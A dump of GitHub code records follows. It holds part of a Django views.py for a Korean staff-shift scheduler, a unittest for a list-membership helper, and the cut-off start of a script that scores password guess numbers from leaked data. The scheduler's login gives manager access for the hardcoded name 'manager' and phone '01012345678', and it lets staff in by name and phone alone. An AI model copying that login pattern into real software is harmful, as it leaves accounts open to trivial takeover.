'금요일', '토요일', '월요일', '화요일', '수요일', '목요일']\n timeList = ['D', 'N', 'N1', 'D1', 'N2', 'D2', 'M', 'M1', 'M2', 'M3', 'M4']\n newList = []\n originList = []\n origin_minFailList=[]\n new_minFailList=[]\n\n qs = Staff.objects.filter(possible_N_days__gte = n).order_by('-score')\n for staff in qs:\n if (staff.newcomer == True):\n newList.append(staff)\n\n else:\n originList.append(staff)\n\n # 기존 스태프 스케쥴링 - N일\n print(\"##### 기존 미소지기 %d 일 스케줄링######\" % (n))\n for staff in originList:\n count = Real_schedule.objects.filter(staff_id=staff).count()\n limit = n\n possible = Possible_schedule.objects.filter(staff_id=staff, day_assigned=False)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs - temp2.needs_newcomer <= temp2.real_origin: # 충분한 자리가 있는가?\n continue # 다음 시간대로 넘김, 요일은 그대로라서 continue\n for pos in possible:\n if pos.day_id == temp2:\n # day에 자리가 있으면 추가\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n break\n if count >= limit:\n break\n\n if count < limit :\n origin_minFailList.append(staff)\n\n print(origin_minFailList)\n\n\n # 신규 스태프 스케쥴링 - N일\n print(\"##### 신입 미소지기 %d 일 스케줄링######\" % (n))\n for staff in newList:\n count = Real_schedule.objects.filter(staff_id=staff).count()\n limit = n\n possible = Possible_schedule.objects.filter(staff_id=staff, day_assigned=False)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs_newcomer <= temp2.real_newcomer: # 충분한 자리가 있는가?\n continue\n for pos in possible:\n if pos.day_id == temp2:\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n break\n if count >= limit:\n break\n\n if count < limit:\n new_minFailList.append(staff)\n\n\n # ===============================================================\n # <Phase3>\n # ## Modifier ##\n # 강제 수정\n # ===============================================================\n # minFailList에서 3일 배정\n print(\"##### 기존 미소지기 %d 일 강제 Modify 진행 중.. ######\" % (n))\n print(origin_minFailList)\n\n for staff in origin_minFailList:\n c = modifyFailStaff(staff,n)\n\n print(\"##### 신입 미소지기 %d 일 강제 Modify 진행 중.. ######\" % (n))\n for staff in new_minFailList :\n c = modifyFailStaff(staff,n)\n return True\n\ndef runSchedule():\n originList = []\n newList = []\n dayList = ['일요일', '금요일', '토요일', '월요일', '화요일', '수요일', '목요일']\n timeList = ['D', 'N', 'N1','D1','N2','D2', 'M', 'M1', 'M2', 'M3', 'M4']\n\n origin_minFailList = [] # 기존미소지기 중 최소근무일수 미충족 리스트\n new_minFailList =[] # 신입미소지기 중 최소근무일수 미충족 리스트\n\n\n # ===============================================================\n # <Phase1>\n # 실제 스케줄링 시작 전 Pre-Process\n # 1. 실제 스케줄 데이터 초기화\n # 2. 요일/날짜 마다 실제 배치 인원 초기화\n # 3. 모든 미소지기의 complete Boolean Set : 실제 스케줄 배치가 완료되었는가에 관한 Data 초기화\n # // min_complete : 최소 근무일을 만족시켰는가?\n # ( 모든 미소지기가 최소 3일은 근무 해야 할 때, 3일도 못채웠을 경우 False, 3일 이상 배치되었다면 True )\n # // max_complete : 희망 근무일을 만족시켰는가?\n # ( 미소지기가 제출한 희망 근무일수가 5일 일 때, 5일 배치 되었을 경우 True, 4일 이하 일 경우 False )\n # 4. 가능 스케쥴의 is_assigned / day_assigned 초기화\n # ===============================================================\n\n # 1. 실제 스케줄 데이터 초기화\n Real_schedule.objects.all().delete()\n print(Real_schedule.objects.all())\n\n # 2. 요일/날짜 마다 실제 배치 인원 초기화\n # day의 real_origin과 real_newcomer 초기화\n for day in Day.objects.all():\n day.real_newcomer = 0\n day.real_origin = 0\n day.save()\n\n # 3. 모든 미소지기의 complete Boolean Set : 실제 스케줄 배치가 완료되었는가에 관한 Data 초기화\n # Staff.min_complete , Staff.max_complete 초기화\n \n print(\"##### STAFF 초기화 중 ... ######\")\n for staff in Staff.objects.all():\n staff.min_complete = False\n staff.max_complete = False\n staff.save()\n\n # 4. Possible_schedule의 is_assigned / day_assigned 초기화\n print(\"##### 모든 가능스케줄들 초기화 중 ... ######\")\n for schedule in Possible_schedule.objects.all():\n schedule.is_assigned = False\n schedule.day_assigned = False\n schedule.save()\n\n\n # ===============================================================\n # <Phase2>\n # ## Initializer ##\n # 스케줄링\n # ===============================================================\n\n # Staff 분리, ordering -> 점수 순서대로\n print(\"##### 기존/신입 미소지기 분리 중 ... ######\")\n qs = Staff.objects.all().order_by('-score')\n for staff in qs:\n if(staff.newcomer == True):\n newList.append(staff)\n\n else:\n originList.append(staff)\n print(originList)\n # print(newList)\n\n # 기존 스태프 스케쥴링 - 3일 먼저\n print(\"##### 기존 미소지기 3일 먼저 짜는 중 ... ######\")\n for staff in originList:\n count = 0\n limit = 3\n possible = Possible_schedule.objects.filter(staff_id=staff)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs - temp2.needs_newcomer <= temp2.real_origin: # 충분한 자리가 있는가?\n continue # 다음 시간대로 넘김, 요일은 그대로라서 continue\n for pos in possible:\n if pos.day_id == temp2:\n # day에 자리가 있으면 추가\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n\n break\n\n if count >= limit:\n staff.min_complete = True\n staff.save()\n break\n\n if staff.min_complete == False :\n origin_minFailList.append(staff)\n\n print(origin_minFailList)\n\n\n # 신규 스태프 스케쥴링 - 3일 먼저\n print(\"##### 신입 미소지기 3일 먼저 짜는 중 ... ######\")\n for staff in newList:\n count = 0\n limit = 3\n possible = Possible_schedule.objects.filter(staff_id=staff)\n\n for day in dayList:\n day_success = 0 # 그 날에 scheduling이 되었는가\n\n for time in timeList:\n if day_success != 0:\n break\n temp2 = Day.objects.get(day=day, time=time) #### day model\n if temp2.needs_newcomer <= temp2.real_newcomer: # 충분한 자리가 있는가?\n continue\n for pos in possible:\n if pos.day_id == temp2:\n createRealSchedule(pos.id)\n day_success = 1\n count = count + 1\n\n break\n\n if count >= limit:\n staff.min_complete = True\n staff.save()\n break\n\n if staff.min_complete == False:\n new_minFailList.append(staff)\n\n\n # ===============================================================\n # <Phase3>\n # ## Modifier ##\n # 강제 수정\n # ===============================================================\n # minFailList에서 3일 배정\n print(\"##### 기존 미소지기 3일 배정 강제 Modify 진행 중 ... ######\")\n print(origin_minFailList)\n\n for staff in origin_minFailList:\n c = modifyFailStaff(staff,3)\n\n print(\"##### 신입 미소지기 3일 배정 강제 Modify 진행 중 ... ######\")\n for staff in new_minFailList :\n c = modifyFailStaff(staff,3)\n\n run_schedule_Ndays(4)\n run_schedule_Ndays(5)\n\n return True\n\ndef modifyFailStaff(staff, hope):\n dayList2 = ['토요일', '일요일', '금요일', '월요일', '화요일', '수요일', '목요일']\n timeList2 = ['D', 'N', 'N1', 'D1', 'N2', 'D2', 'M', 'M1', 'M2', 'M3', 'M4']\n timeList2.reverse()\n\n count = Real_schedule.objects.filter(staff_id=staff).count() # 현재까지 배치된 실제스케줄 수\n\n ####### day_assigned = False filtering ########## (fail 미소지기가 가능한 스케줄을 가져올때는 day_assigned 도 체크)\n\n for day in dayList2:\n for time in timeList2:\n bolt = 0\n if count >= hope: # 3일 planning module 이기 때문에 limit = 3\n # 실제 스케줄이 3일 이상이면 함수종료\n return count\n\n # temp2 는 dayList2 와 timeList2를 활용하여 재정렬한 결과임\n # EX) ['토요일':'M1','토요일':'M' ..... '목요일':'N', '목요일':'D']\n temp2 = Day.objects.get(day=day, time=time) #### day model\n possible = Possible_schedule.objects.filter(staff_id=staff, is_assigned=False, day_assigned=False)\n for pos in possible:\n if bolt == 1 :\n break\n \n if pos.day_id == temp2:\n # 강제 변경해야 될 시간대에 실제로 배치된 스케줄들을 뽑아옴\n # (이 instance 안에 배치된 미소지기 정보가 있음)\n candidateRealscheudles = Real_schedule.objects.filter(day_id=temp2).reverse()\n\n if staff.newcomer:\n # 실제로 배치된 스케줄들에서 for 문 반복하며 개별 staff를 뽑음\n for candidateReal in candidateRealscheudles:\n\n # candidateStaff 는 실제 스케줄에 배치 된 개별 미소지기\n candidateStaff = candidateReal.staff_id\n if candidateStaff.newcomer :\n # 실패한 미소지기가 강제로 들어가야 될 스케줄에서\n # 후보 미소지기를 다른 시간대로 옮기는 작업 : modifyCandidates()\n if modifyCandidates(candidateStaff, temp2) : # 다른 시간대로 옮기기에 성공했다면\n\n # 다른시간대로 옮겨진 미소지기의 실제 스케줄 삭제\n updateRealSchedule(candidateReal.id,pos.id)\n count += 1\n bolt = 1\n break\n\n else :\n for candidateReal in candidateRealscheudles:\n # candidateStaff 는 실제 스케줄에 배치 된 개별 미소지기\n candidateStaff = candidateReal.staff_id\n if candidateStaff.newcomer == False :\n # 실패한 미소지기가 강제로 들어가야 될 스케줄에서\n # 후보 미소지기를 다른 시간대로 옮기는 작업 : modifyCandidates()\n if modifyCandidates(candidateStaff, temp2) : # 다른 시간대로 옮기기에 성공했다면\n updateRealSchedule(candidateReal.id, pos.id)\n count += 1\n bolt = 1\n break\n return count\n\ndef modifyCandidates(candidateStaff, real_day):\n candidatePossibles = Possible_schedule.objects.filter(staff_id=candidateStaff,\n is_assigned=False, day_assigned=False)\n\n # candidate 는 지금 modify 하려는 날 먼저 possible 있는지 찾고 그뒤에는 day_assigned=False로 재필터링\n candidate_today = Possible_schedule.objects.filter(staff_id=candidateStaff, day_id=real_day,\n is_assigned=False)\n\n # 지금 modify 하려는 real_day 먼저 possible 있는지 찾는 과정\n if candidateStaff.newcomer :\n for today_possible in candidate_today:\n candidateDay = today_possible.day_id\n if candidateDay.needs_newcomer > candidateDay.real_newcomer:\n createRealSchedule(today_possible.id)\n return True\n\n else :\n for today_possible in candidate_today:\n candidateDay = today_possible.day_id\n if candidateDay.needs - candidateDay.needs_newcomer > candidateDay.real_origin:\n createRealSchedule(today_possible.id)\n return True\n\n\n # real_day에 candidatePos 중 가능한날이 없다면 다른 날들 에서는 day_assigned=False 조건 추가 후 진행\n if candidateStaff.newcomer :\n for candidatePos in candidatePossibles:\n candidateDay = candidatePos.day_id\n if candidateDay.needs_newcomer > candidateDay.real_newcomer:\n createRealSchedule(candidatePos.id)\n return True\n\n else :\n for candidatePos in candidatePossibles:\n candidateDay = candidatePos.day_id\n if candidateDay.needs - candidateDay.needs_newcomer > candidateDay.real_origin:\n createRealSchedule(candidatePos.id)\n return True\n\n return False\n\n\n \n\n'''\n# 실행하는 경우 : Real_schedule이 삭제된 경우, Day.needs <= Day.real_origin이 되는 경우\n# Modifiable을 체크하고 결과를 반환한다.\ndef checkModifiableOrigin(da): # Day의 id\n day = Day.objects.get(pk=da)\n # 1. day의 Staff가 부족한 경우 : True\n if day.real_origin > day.needs:\n day.modifiable_origin = True\n day.save()\n return True\n\n # 2. day의 Staff가 충분한 경우 :\n # 배정된 Staff중 하나라고 다른 Day에 Schedule을 가질 수 있는 경우 True\n # 아닌 경우 False\n\n # day의 Staff들\n staff = []\n for real in Real_schedule.objects.filter(day_id=da):\n staff.append(real.staff_id)\n\n # 한명의 Staff라도 변경 가능하다면 Modifiable\n for stf in Staff:\n # Staff의 가능 스케쥴의 Day들\n days = Possible_schedule.objects.filter(staff_id=stf, is_assigned=False).day_id\n\n for day2 in days:\n if day2.modifiable_origin:\n day.modifiable_origin = True\n day.save()\n return True\n\n day.modifiable_origin = False\n day.save()\n return False\n'''\n\n\ndef createRealSchedule(possible): # Possible_schedule의 id\n print(\"Real Schedule 생성 ...\")\n\n pos = Possible_schedule.objects.get(pk=possible)\n stf = pos.staff_id\n da = pos.day_id\n print(pos)\n\n # Possible_schedule 동기화\n pos.is_assigned = True\n pos.save()\n\n staffPossibles = Possible_schedule.objects.filter(staff_id=pos.staff_id)\n for possible in staffPossibles:\n if possible.day_id.day == pos.day_id.day:\n possible.day_assigned = True\n possible.save()\n\n # Day 동기화\n if stf.newcomer:\n da.real_newcomer = da.real_newcomer + 1\n else:\n da.real_origin = da.real_origin + 1\n da.save()\n\n # Real_schedule 생성\n rs = Real_schedule(staff_id=stf, day_id=da)\n rs.save()\n return True\n\n\ndef updateRealSchedule(real_id, pos_id): # Real_schedule의 id, Possible_schedule의 id\n real = Real_schedule.objects.get(pk=real_id)\n staff = real.staff_id\n day = real.day_id\n pos = Possible_schedule.objects.get(staff_id=staff, day_id=day)\n new_pos = Possible_schedule.objects.get(pk=pos_id)\n\n # Possible_schedule 동기화\n candidatePossibles = Possible_schedule.objects.filter(staff_id=pos.staff_id)\n failPossibles = Possible_schedule.objects.filter(staff_id=new_pos.staff_id)\n pos.is_assigned = False\n pos.save()\n for possible in candidatePossibles:\n if possible.day_id.day == pos.day_id.day:\n possible.day_assigned = False\n possible.save()\n\n new_pos.is_assigned = True\n new_pos.save()\n for possible in failPossibles:\n if possible.day_id.day == new_pos.day_id.day:\n possible.day_assigned = True\n possible.save()\n\n # 결과적으로 Day 변화 없음\n\n # Real_schedule 수정\n real.staff_id = new_pos.staff_id\n real.save()\n return\n\n'''\ndef createRealSchedule(staff, day): # Staff의 id, Day의 id\n print(\"Real Schedule 생성 ...\")\n stf = Staff.objects.get(pk=staff)\n da = Day.objects.get(pk=day)\n rs = Real_schedule(staff_id=stf, day_id=da)\n rs.save()\n\n return\n'''\n\n'''\ndef runSchedule():\n originList = []\n newList = []\n dayList = ['일요일', '금요일', '토요일', '월요일', '화요일', '수요일', '목요일', '금요일']\n timeList = ['D','N','D1','M','M1']\n dayOrder = []\n\n qs = Staff.objects.all().order_by('-score')\n for staff in qs:\n if(staff.newcomer == True):\n newList.append(staff)\n\n else:\n originList.append(staff)\n\n print(originList)\n print(newList)\n\n dayAll = Day.objects.all()\n for day in dayList:\n for dayInstance in dayAll:\n if dayInstance.day == day:\n pass\n\n print(\"==========\")\n print(dayOrder)\n for staff in originList:\n count = 0\n limit = staff.possible_N_days\n possible = Possible_schedule.objects.filter(staff_id=staff)\n print(possible)\n for day in dayList:\n for dayInstance in dayAll:\n if dayInstance.day == day:\n pass\n\n while(count < limit):\n break\n\n return True\n'''\n\ndef runScheduleView(request):\n if(runSchedule()):\n return redirect('/manager/')\n return render(request, 'plan/planning_running.html')\n\n\nclass PossibleList(TemplateView):\n template_name = 'plan/main.html'\n\n def get_context_data(self,**kwargs):\n qs=Possible_schedule.objects.all\n context = super(PossibleList, self).get_context_data(**kwargs)\n context['possibleAll'] = qs\n return context\n\n'''\ndef temppossible(request):\n if request.method == 'POST':\n form = PossibleForm(request.POST)\n\n if form.is_valid():\n possible = form.save(commit=True)\n return redirect('../')\n else:\n form = PossibleForm()\n\n return render(request, 'plan/main.html', {'form':form})\n\n'''\n\n\ndef possibleCreateRetrieveView(request):\n dayList = ['월요일', '화요일', '수요일', '목요일','금요일','토요일','일요일']\n print(request.POST.get('id'))\n if request.method == 'POST':\n staff_name=request.POST.get('name') # 천재용으로 받아옴 웹에서\n query_result = Staff.objects.get(name=staff_name) # 이름으로 staff 를 필터링\n\n print(query_result.id)\n print(type(query_result))\n\n for day in dayList:\n dayTime = request.POST.get(day)\n print(\"==========dayTIme===============\" + dayTime)\n print(type(dayTime))\n if(dayTime == '0'):\n continue\n dayInstance = Day.objects.filter(day=day).get(time=dayTime)\n print(dayInstance)\n\n new_instance = Possible_schedule(staff_id=query_result, day_id=dayInstance)\n new_instance.save()\n\n return redirect('./')\n\n elif request.method =='GET':\n possibleAll = Possible_schedule.objects.all()\n context = {'possibleAll': possibleAll}\n\n return render(request, 'plan/main.html', context)\n\n\ndef loginView(request):\n '''\n Day.objects.all().delete()\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n for day in dayList:\n for time in timeList:\n Day(day=day, time=time).save()\n '''\n #Real_schedule.objects.all().delete()\n context = {}\n if request.method == 'POST':\n post = request.POST\n staffName=post.get('name')\n staffPhone=post.get('phone')\n context['staffName'] = staffName\n context['staffPhone'] = staffPhone\n\n if (staffName == 'manager'):\n if(staffPhone == '01012345678'):\n return redirect('../manager/')\n else:\n context['message'] = \"권한오류 : 매니저 정보를 다시 입력하세요\"\n return render_to_response('plan/loginAlert.html', context)\n\n print(staffName + ':' + staffPhone)\n qs = Staff.objects.filter(name=staffName)\n if qs.count()==0:\n context['message'] = \"경고 : \"+staffName+\" 은 등록 되어 있지 않습니다. 새로 추가하시겠습니까?\"\n context['mode'] = 2\n newInstance = Staff(name=staffName, phone=staffPhone)\n newInstance.save()\n\n else:\n qs = Staff.objects.filter(phone=staffPhone)\n if (qs.count==0):\n context['message'] = \"경고 : \" + staffName + \"미소지기는 이미 등록 되어 있습니다.\\n\" + staffPhone + \"번호로 추가하시겠습니까?\"\n context['mode'] = 2\n newInstance = Staff(name=staffName, phone=staffPhone)\n newInstance.save()\n\n return redirect('../staff/'+staffName+'/'+staffPhone+'/')\n\n elif request.method == 'GET':\n pass\n\n return render(request, 'plan/login.html')\n\n\ndef managerView(request):\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method==\"GET\":\n staffAll = Staff.objects.all().order_by('name')\n realAll = Real_schedule.objects.all().order_by('day_id')\n cellList = []\n\n for staff in staffAll:\n staffDic = {'name': \"\", \"월요일\": [], \"화요일\": [], \"수요일\": [], \"목요일\": [], \"금요일\": [], \"토요일\": [], \"일요일\": [], \"신청일\":\"\",\"근무일\":\"\"}\n staffreals = realAll.filter(staff_id=staff)\n staffDic['name'] = staff.name\n staffDic[\"신청일\"] = staff.possible_N_days\n staffDic[\"근무일\"] = staffreals.count()\n\n for staffReal in staffreals :\n posDay = staffReal.day_id.day # 신청 가능스케줄의 요일\n posTime = staffReal.day_id.time # 신청 가능스케줄의 시간대\n staffDic[posDay].append(posTime)\n\n cellList.append(staffDic)\n\n context = {'staffAll':staffAll,'realAll':realAll, 'dayList':dayList, 'cellList':cellList}\n return render(request, 'plan/manager.html', context)\n\n\ndef staffView(request, staffName, staffPhone):\n dayList = ['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n print(\"==========\")\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n timeStr = ['D, 6.75h', '06:30 - 13:30, 6.75h', '09:00 - 16:00, 6.75h', '09:30 - 16:30, 6.75h', '13:00 - 20:00, 6.75h', '14:00 - 21:00, 6.75h', '15:00 - 22:00, 6.75h', '16:00 - 23:00, 6.75h', '18:00 - 25:00, 6.75h','20:00 - 27:00, 6.75h', '21:00 - 28:00, 6.75h']\n possibleDays=[]\n bolt=0\n weekendCount = 0\n context = {\"staffName\" : staffName, \"staffPhone\" : staffPhone, \"dayList\" : dayList, \"timeList\": timeList, \"timeStr\":timeStr }\n\n staff = Staff.objects.filter(name=staffName).get(phone=staffPhone)\n print(staff)\n \n if request.method == \"POST\":\n post = request.POST\n print(post)\n for time in timeList: \n postList = post.getlist(time)\n for day in postList:\n for a in possibleDays:\n bolt=0\n if(a==day):\n bolt=1\n break\n if bolt != 1:\n possibleDays.append(day)\n print(\"===============\")\n print(possibleDays)\n for day in possibleDays:\n if day == '토요일' or day == '일요일':\n weekendCount += 1\n\n print(\"주말수 : \" + str(weekendCount))\n if weekendCount == 0 :\n context['message'] = \"최소한 주말 하루는 추가 해주세요!!(토요일, 일요일)\"\n return render_to_response('plan/staffPossibleAlert.html', context)\n\n if len(possibleDays) < int(post.get(\"희망근무일수\")) :\n context['message'] = \"희망근무일수 보다 신청한 근무요일이 적습니다!!\"\n return render_to_response('plan/staffPossibleAlert.html', context)\n \n staff.possible_N_days = post.get(\"희망근무일수\")\n staff.save()\n print(staff.possible_N_days)\n\n # possible schedule 초기화 (모두 삭제)\n Possible_schedule.objects.filter(staff_id=staff).delete()\n\n for time in timeList:\n postList = post.getlist(time)\n print(postList)\n\n for day in postList:\n dayInstance = Day.objects.filter(day=day).get(time=time)\n new_instance = Possible_schedule(staff_id=staff, day_id=dayInstance)\n new_instance.save()\n\n return redirect(\"/staff/\"+staffName+\"/\"+staffPhone+\"/\")\n elif request.method == \"GET\":\n possible = Possible_schedule.objects.filter(staff_id=staff)\n\n context[\"day_num\"] = staff.possible_N_days\n context[\"possibleAll\"] = possible\n print(possible)\n return render(request, 'plan/staff_schedule_enrollment.html', context)\n\n\ndef staffRealView(request, staffName, staffPhone):\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n context = { 'staffName':staffName, 'staffPhone':staffPhone, 'dayList':dayList }\n staff = Staff.objects.get(name=staffName, phone=staffPhone)\n reals = Real_schedule.objects.filter(staff_id = staff)\n context[\"day_num\"] = reals.count()\n context['realAll'] = reals\n\n return render(request, 'plan/staff_realSchedule.html', context)\n\ndef manageStaffView(request):\n staffAll = Staff.objects.all().order_by('name')\n context = {'staffAll': staffAll, }\n if request.method==\"GET\":\n print(\"getgetget\")\n\n elif request.method == 'POST':\n post = request.POST\n print(\"what is a post : \", end=\"\")\n print(post)\n for staff in staffAll:\n postedList=post.getlist(str(staff))\n print(postedList)\n if len(postedList) != 0 :\n if(postedList[0] != ''): # score 평가점수 수정\n staff.score=postedList[0]\n\n if(len(postedList) == 2) : # newcomer 신입여부 수정\n staff.newcomer = True\n else:\n staff.newcomer = False\n\n staff.save()\n\n return redirect('./')\n\n return render(request, 'plan/manager_staff.html', context)\n\n\ndef manageNeedsView(request):\n if request.method ==\"GET\":\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n dayAll = Day.objects.all()\n context = {'dayAll':dayAll, 'timeList':timeList}\n\n elif request.method == 'POST':\n post = request.POST\n print(post)\n return redirect('./')\n return render(request, 'plan/manager_needs.html',context)\n\n\ndef manageNeedsUpdate(request, day):\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method ==\"GET\":\n dayAll = Day.objects.all()\n context = {'dayAll':dayAll, 'timeList':timeList, 'dayList':dayList, 'currentDay': day}\n\n elif request.method == 'POST':\n post = request.POST\n print(post)\n currentday = day\n for time in timeList:\n forupdate = Day.objects.filter(day=currentday)\n needsList = post.getlist(time)\n forupdate = forupdate.get(time=time)\n\n if needsList[0] == '':\n if needsList[1] == '':\n forupdate.needs_newcomer = 0\n else:\n forupdate.needs_newcomer= needsList[1]\n else:\n forupdate.needs = needsList[0]\n if needsList[1] == '':\n forupdate.needs_newcomer = 0\n else:\n forupdate.needs_newcomer= needsList[1]\n forupdate.save()\n\n return redirect('/manager/hr/')\n\n return render(request, 'plan/manager_needs_update.html',context)\n\n\n# 가능스케줄 페이지 뷰\ndef possibleSchedulesView(request):\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method==\"GET\":\n staffAll = Staff.objects.all().order_by('name')\n possibleAll = Possible_schedule.objects.all().order_by('day_id')\n cellList = []\n\n for staff in staffAll:\n staffDic = {'name': \"\", \"월요일\": [], \"화요일\": [], \"수요일\": [], \"목요일\": [], \"금요일\": [], \"토요일\": [], \"일요일\": []}\n staffPossibles = possibleAll.filter(staff_id=staff)\n staffDic['name'] = staff.name\n\n for staffPossible in staffPossibles :\n posDay = staffPossible.day_id.day # 신청 가능스케줄의 요일\n posTime = staffPossible.day_id.time # 신청 가능스케줄의 시간대\n staffDic[posDay].append(posTime)\n\n cellList.append(staffDic)\n\n context = {'staffAll':staffAll,'possibleAll':possibleAll, 'dayList':dayList, 'cellList':cellList}\n return render(request, 'plan/manager_possibles.html', context)\n\n# 가능스케줄 검색 뷰\ndef possibleSearchView(request):\n dayList =['월요일','화요일','수요일','목요일','금요일','토요일','일요일']\n if request.method==\"GET\":\n staffAll = Staff.objects.all().order_by('name')\n possibleAll = Possible_schedule.objects.all().order_by('day_id')\n\n name = request.GET.get('name', '')\n day = request.GET.get('day', '')\n time = request.GET.get('time', '')\n print(\"====================SearchView====================\")\n print(\"get.name : \", end=\"\")\n print(name)\n print(\"get.day : \", end=\"\")\n print(day)\n print(\"get.time : \", end=\"\")\n print(time)\n\n # 이름으로 검색\n if(name != '') :\n # 스태프\n staffAll = staffAll.filter(name=name)\n q = staffAll\n # 스케줄\n result = []\n for staff in q:\n qs = possibleAll.filter(staff_id=staff)\n\n for possible in qs:\n result.append(possible)\n\n possibleAll = result\n print(possibleAll)\n\n # 요일로 검색\n if(day != '') :\n # 스케줄\n dayList = [day]\n result = []\n if(name !=''):\n for ps in possibleAll:\n if ps.day_id.day == day:\n result.append(ps)\n\n else:\n d = Day.objects.filter(day=day)\n for ds in d:\n q = possibleAll.filter(day_id=ds)\n for qs in q:\n result.append(qs)\n\n possibleAll = result\n\n # 시간으로 검색\n if(time != '') :\n # 스케줄\n result = []\n if (name != '' or day != ''):\n for ps in possibleAll:\n if ps.day_id.time == time:\n result.append(ps)\n\n else:\n t = Day.objects.filter(time=time)\n for ts in t:\n q = possibleAll.filter(day_id=ts)\n for qs in q:\n result.append(qs)\n\n possibleAll = result\n\n # 요일과 시간 검색 : 스태프\n if(day != '' or time !=''):\n posStf = []\n\n for pos in possibleAll:\n if not posStf.__contains__(pos.staff_id):\n posStf.append(pos.staff_id)\n result = []\n for stf in staffAll:\n if posStf.__contains__(stf):\n result.append(stf)\n staffAll = result\n\n context = {'staffAll':staffAll,'possibleAll':possibleAll, 'dayList':dayList}\n\n if(day=='' and time =='' and name==''):\n context = {'dayList': dayList}\n\n return render(request, 'plan/manager_possibles_search.html', context)\n\n\n# 매니저-실제스케줄조회뷰\ndef manageRealView(request):\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n realAll = Real_schedule.objects.all()\n context = {'dayList':dayList, 'timeList':timeList,'realAll':realAll}\n\n return render(request, 'plan/manager_realSchedules.html', context)\n\n\ndef manageRealDayView(request, day):\n dayList = ['월요일', '화요일', '수요일', '목요일', '금요일', '토요일', '일요일']\n timeList = ['D', 'D1', 'D2', 'M', 'M1', 'M2', 'M3', 'M4', 'N', 'N1', 'N2']\n realAll = Real_schedule.objects.all()\n dayAll = Day.objects.all()\n staffAll = Staff.objects.all()\n context = {'day':day,'dayList':dayList, 'timeList':timeList,'realAll':realAll, 'dayAll':dayAll, 'staffAll':staffAll}\n\n return render(request, 'plan/manager_realSchedules_day.html', context)\n\n\n# 페이지 확인을 위한 임시 뷰\ndef indexTest(request):\n return render(request, 'plan/index.html')\n'''\ninstance 뽑아내는 예제\n if request.method==\"GET\":\n staffAll = Staff.objects.all()\n for instance in staffAll:\n staffName = instance.name\n staffPhone = instance.phone\n staffScore = instance.score\n staffPossibleDay = instance.possible_N_days\n context = {'staffAll' : staffAll}\n'''","repo_name":"geniyong/schedule_manager","sub_path":"project/miso/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":36067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"17583652460","text":"'''A Class for testing whether a value is included in a list'''\nimport unittest\nfrom does_include import does_include\n\nclass TestDoesInclude(unittest.TestCase):\n '''A Class for testing whether a value is included in a list'''\n def test_five_nums(self):\n '''Test a list of five nums containing search value'''\n nums = [1, 2, 3, 4, 5]\n search_val = 3\n is_present = does_include(nums, search_val)\n self.assertTrue(is_present)\n\n def test_five_nums_num_not_present(self):\n '''Test a list of five nums not containing search value'''\n nums = [1, 2, 3, 4, 5]\n search_val = 6\n is_present = does_include(nums, search_val)\n self.assertFalse(is_present)\n\n def test_empty_list(self):\n '''Test an empty list'''\n lst = []\n search_val = 3\n is_present = does_include(lst, search_val)\n self.assertFalse(is_present)\n\n def test_none_values(self):\n '''Test a list of None values'''\n lst = [None]\n search_val = None\n is_present = does_include(lst, search_val)\n self.assertTrue(is_present)\n\n def test_empty_list_verse_none(self):\n '''Test an empty list for a None value'''\n lst = []\n search_val = None\n is_present = does_include(lst, search_val)\n self.assertFalse(is_present)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"T-monius/python-small-problems","sub_path":"easy-6/does-include/test_does_include.py","file_name":"test_does_include.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4119080822","text":"import tensorflow as tf\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom input_pipeline import read_and_parse_single_leak, make_dataset\nfrom loss import get_probability \nfrom inference import ancestral_sampling\n\ndef scoring(G, n=10):\n Gs = np.sort(G)\n gy = np.cumsum(np.ones(len(Gs))) / len(Gs)\n \n scores = np.zeros(n)\n for i, guess_limit in enumerate(np.linspace(0.1, 1, n)):\n q = (gy<guess_limit).sum()\n num_guesses = Gs[q]\n scores[i] = num_guesses\n \n return scores\n\n\ndef plot_guess_number(\n G,\n guessed_limit=1.,\n guesses_limit=(10**3, 10**15),\n ax=None,\n x_lim=None,\n **plot_kargs\n ):\n if ax is None:\n fig, ax = plt.subplots(1, 1, figsize=(8, 6))\n\n Gs = np.sort(G)\n\n gss_limit = (Gs<guesses_limit[1]).sum()\n\n gy = np.cumsum(np.ones(len(Gs))) / len(Gs)\n ged_limit = (gy<guessed_limit).sum()\n\n n = min([gss_limit, ged_limit])\n\n x = Gs[:n]\n y = np.cumsum(np.ones(n) / len(Gs))\n\n ax.plot(x, y, 